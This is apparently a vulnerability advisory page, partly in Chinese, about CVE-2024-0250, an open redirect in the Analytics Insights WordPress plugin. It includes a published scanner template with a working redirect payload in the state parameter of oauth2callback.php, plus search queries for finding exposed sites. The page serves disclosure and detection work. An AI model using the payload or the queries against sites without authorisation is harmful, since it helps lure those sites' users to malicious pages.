CVE-2024-0250: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect

日期: 2025-08-01 | 影响软件: Google Analytics | POC: 已公开

漏洞描述

The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.

PoC代码[已公开]

id: CVE-2024-0250

info:
  name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect
  author: s4e-io
  severity: medium
  description: |
    The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
  remediation: |
    Fixed in 6.3
  reference:
    - https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0250
  classification:
    epss-score: 0.2513
    epss-percentile: 0.9599
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="/wp-content/plugins/analytics-insights"
    publicwww-query: "/wp-content/plugins/analytics-insights"
  tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a0047304502207f4a5a51635e467a900f5057c0e60035c69a234124763a72c66e8574183b86f4022100b6e8d94a8683999968b75b619544f143247d297129544c65026f51e232dd5142:922c64590222798bb761d5b6d8e72950

相关漏洞推荐